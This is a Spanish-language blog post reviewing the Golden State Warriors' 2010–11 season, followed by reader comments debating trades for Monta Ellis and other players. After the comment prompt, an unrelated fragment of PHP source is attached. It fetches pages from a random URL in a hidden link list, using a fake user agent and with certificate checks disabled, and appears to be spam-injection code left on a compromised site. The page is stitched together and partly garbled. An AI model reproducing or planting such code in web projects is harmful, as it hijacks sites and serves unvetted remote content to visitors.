Golden State Warriors: Suspenso

19 de June de 2011 por telekoman

Acertamos de pleno. Dijmos en torno a las 35 victorias  y han sido 36. Con los mimbres que tiene el equipo no creo que se pueda hacer un canasto deCurry en el centro del resto de su equipo primera calidad, pero al menos debería dar par hacer una cesta del pan. La pareja exterior ha cumplido. Esa parte era la fácil y previsible. Monta Ellis y Stephen Curry se han complementado suficientemente como para hacer 42 puntos de media entre ambos y añadirles 11 asistencias y más de 7 rebotes. Entre los dos absorben todas las bolas disponibles en el juego, pero con poca capacidad de distribución. De hecho eso es lo que más se le puede reprochar al joven Curry. Pero todavía es su segundo año y todos sabemos que es el más complicado.

Tras el culebrón del primer año centrado en las relacciones entre Curry y Ellis, todas las miradas se han dirigido este año en la adaptación de David Lee. Muy condicionado por los 10 millones y medio de su contrato, Lee no ha terminado de ser todo lo que los aficionados de Oakland querían que fuera. El PF ha bajado en casi 4 puntos y 2 rebotes sus promedios del último año en los Knicks. Las causas pueden ser variadas, pero creo que es evidente que a David le viene mejor un base distribuidor a uno anotador.

El puesto de 3, a priori el más flojo, no ha estado tan  mal cubierto como se suponía. Dorell Wright ha sabido responder a la confianza depositada por Smart con una temporada más que digna.  Por contra, el puesto de 5, ocupado por el letón Biedrins, ha sido un agujero negro durante toda la temporada, en parte por su precario estado de salud. Veremos si es recuperable.

Mark Jackson pasa a ser entrenador de los WarriorsLo mejor: Que se ha terminado el contrato del cortado Troy Murphy y sus casi 12 kilos. Ah, tampoco nos podemos olvidar de los casi 7 de Radmanovic. La llegada de Mark Jackson que deberá traer 2 cosas: algo de defensa y un tipo de juego algo más organizado que pueda ser más válido para las característcas de Lee.

Lo peor: Que aprender a defender no es fácil sobre todo cuando no estás preparado para ello. Que la elección del draft, la 11, es demasiada alta para un draft poco profundo.

Jugando a GM:

– Se está habando mucho del posible trade de Monta Ellis. El escolta es evidentemente un caramelito pero…. Es un caramelo caro, 11 kilos, y con mucha personalidad. Es decir, es algo difícil de concretar. Vamos a intentarlo. La posibilidad de intercambiarlo por  Iguodala es bastante real. Ambos tienen un nivel de contratos similar lo que facilitaría un posible trueque, pero quedan flecos sueltos. Philadelphia quiere mejorar e incorporando a Ellis podría hacerlo, pero taapando el futuro del joven Turner.

– Otra opción de traspaso sería buscar potenciar el juego interior. Rebuscando un poco podriamos intentar traernos a Nené, el pivot de Denver. Eso dejaría a los de Colorado algo cojos por dentro, por lo que habría que acompañar a Ellis con algo de músculo. Soltar a Biedrins podría ser una opción para ambos. El traspaso de Ellis por un jugador como Nené reduce el caudal anotador de los Warriors, pero eso se podría solucionar intentando ir a por un jugador como Jamal Crawford que este año es agente libre. Dinero hay.

– También se habla de intentar rejuvencer más aún el equipo traspasando a Ellis por el número 2 del draft que posee Minnesota. La incorporación de Derrick Williams reforzaría el puesto de 3, pero sería toda una incógnita. Eso sí, el futuro sería aparentemente bueno.

– ¿Y que hacemos con la elección 11 en el caso de que no la traspasemos?  Todos los mocks apuntan a un PF que pueda hacer que David Lee pase a la posición de 5. Pero es difícil encontrar algo adecuado con un número tan alto. Marcus Morris o Biyombo pueden ser una altermativa. En todo caso, si Ellis es traspasado, seguramente buscarán otro escolta que pueda hacer de backup del recien llegado.

Comenta

11 comentarios a esta entrada

  1. jas dice:
    #1

    Pues ayer aparecia un rumor con muxa fuerza, ellis+biedrins+udoh por dwight howard

      Citar

  2. Esteban dice:
    #2

    los warriors deben desacerse ya de ELLIS, y conseguir algo de mas regularidad en todo su juego, con ellis curry y lee, mas wright y bedrins, tienen un equipo para superar las 40 victorias y llegar a un 8vo puesto pero no mucho mas, nunca seran candidatos serios a pasar primer ronde del oeste
    iguodala es un jugadfor mas completo, juega en equipo, es exelente defensor y su mayor virtud respecto a ellis, no me mide 1.85 y pesa 80 kilos, por lo que un jugador como iggy puede cambiar la pestectiva de un erquipo
    imposible que un equipo en play offs, juegue con dos hombres tan pequeñlos y livianos como curry y ellis, q ensima deberian jugar caso todo el partido, tanto bases como esoltas se aprovecharian de sus defensas en play offs
    wight a pesar de su buena temporada tampoco dice mucho de si, jugo bien, pero no creo que sea un jugador que pueda llevar a este equipo lejos

    el trade que encajraia perfecto es ellis por granger, los pacers tienen a george y necesitan un escolta

    los warrios, consiguen un alero infinitamente superior a wriht, completo ya que hace un poco de todo y una garantia, mas de 20 puntos sus ultimas 3 temporadas

    y con el dinero que disponen ir a lña agencia libre por un escolta que pueda hacer lo que hace ellis, tirar
    dicen por alli que es agente libre uin tal JASOPN RICHARSON, ex guarriors y que encajaria a la perfeccion

    y por otro lado, si aspiran a ser candidatos a algo, deberan correr algun riesgo, y ese seria fichar a oden o yaoi ming, el que no arriesga no gana, si les sale mal seran unos millones perdidos, NO MUCHOS, NO TIENEN GRAN VALOR HOY POR HOY ESTOS DOS JUGADORES, Y SI LES SALE BIEN Y PUEDEN JUGAR EN CIERTO NIVEL PUEDEN IRSE HASTA FINALES DE CONFERENCIA

    yo dejaria asi el equipo

    b- curry
    e- jason richarson
    a- danny granger
    ap- david lee
    p-oden o yao (biedrins si ninguno de estos dos se recupera de sus lesiones

    sexto hombre: dorrel wright

    este equipo, deberia pelear por llegar a una final de conferencia

      Citar

  3. TheDeerHunter dice:
    #3

    Lo de Biedrins es un serio contratiempo. 9 kilos, 3 años más y con ese historial de lesiones. Mala pinta. Creo que por ahí van a tener muy difícil rascar. El riesgo al que hacía referencia Esteban ya lo tienen asumido con él. Sería desastroso tener un Biedrins+Oden/Yao en el equipo, todos cobrando y ninguno jugando.

    Yo creo que lo que tiene que hacer GS es asentarse en alguna dirección clara por primera vez en años. Ya me parece suficiente convulsión traspasar a Ellis y yo no tocaría mucho más de eso.
    Me parece bien la medida, porque Ellis nunca ha sido santo de mi devoción y me parece acertado reforzar a Curry en este equipo. Lo de Granger es viable, pero no la veo como la opción más inteligente teniendo a Wright. No sé si es gran cosa, pero es bastante mejor que lo que les va a quedar como escolta si se va Ellis.

      Citar

  4. Esteban dice:
    #4

    hunter, wright es un buen jugador, pero no los va a llevar a ningun lado, ni ahora ni despues
    fijate el heat, podria haberse quedado con beasley y no traer a bosh, pero se dieron cuenta que deasley no es un jugador que pueda llevarlos a ningun lado

    este es el problema que tienen alguna franquicias la reconstruccion eterna, siempre esperando q los jovenes exploten uno y otro año

    creo que los warriors, tienen algunos valores jovenes impiortantes y espacio en el tope para dar el paso al frente
    jason richarson fichadoi como agente libre, hace olvidar a ellis
    y una dup`la de aleros como granger y wright seria explosiva

    sino la que queda es traspasar a wright por un par de internos q ayuden a lee y a biendris

      Citar

  5. TheDeerHunter dice:
    #5

    Lo que digo, Esteban, es que los Warriors tienen agujeros más grandes que tapar a cambio de Ellis que la posición de Wright. La dupla Granger-Wright la veo un poco redundante.

    Y Ellis no me gusta por diversas razones, pero no creo que Jason Richardson pueda sustituirle al mismo nivel.

      Citar

  6. Esteban dice:
    #6

    no al mismo nivel, pero compensan con granger que aumentaria el nivel de wright, y este a su vez saldria desde el banco
    tienen espacio para traer otro pivote con q hacer dupla con biedrins, FOSTER seria un opcion o esperar el explote del rokkie del año pasado

    veo todo muy posible

      Citar

  7. Joaquin dice:
    #7

    Yo a gs no le daria un suspenso la verdad, a principios de temporada iban en puestos de po hasta la primera lesion de lee. Si que han tenido algun bajon gordo, pero en el este por ejemplo se habrian clasificado para po, un suficiente creo yo que seria mejor. Ademas se les ve un futuro, cosa que no es poco.

      Citar

  8. TheDeerHunter dice:
    #8

    Me temo que te equivocas, Joaquin. Con ese balance en el Este hubieran quedado fuera de playoffs también.

    36 victorias (4 de ellas tras OT), cuartos por la cola en su conferencia, puesto 27 en puntos encajados y 19 en rebotes… y el futuro dependerá de lo que saquen de esa subasta pública que están haciendo con Monta Ellis.

    Yo estoy con Esteban: Con lo que tienen, para el suficiente el corte serían 40 victorias. Ni siquiera playoffs les pido.

      Citar

  9. Esteban dice:
    #9

    si no hacen un cambio importante en varuios jugadores, seran un equipo q pueda una temporada llegar al 8 o 7mo puesta, como a la siguiente no clasificarl, y asi por unos años
    es cuestion de eleccion

      Citar

  10. Jonny dice:
    #10

    Como seguidor de Warriors que soy de no ser por las lesiones de curryy lee
    Creo que si que hubieramos luchado por playoffs hasta el final
    El equipo no supo usar a lee hasta final de temporada tanto con el pick
    & pop como.con el pick & roll a ver si toman nota

    Dicho esto las necesidades inmediatas son un C intimidador y un stopper como el comer
    Para defender escoltas o aleros grandes Maurice evans para mi vendria
    De perlas y para C aún sigo soñando con Nene

      Citar

  11. baruczgz dice:
    #11

    Que opinais de Ekpe Udoh y de su progresion para este año??? Pueder llegar a ser un titular consolidado en la liga?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>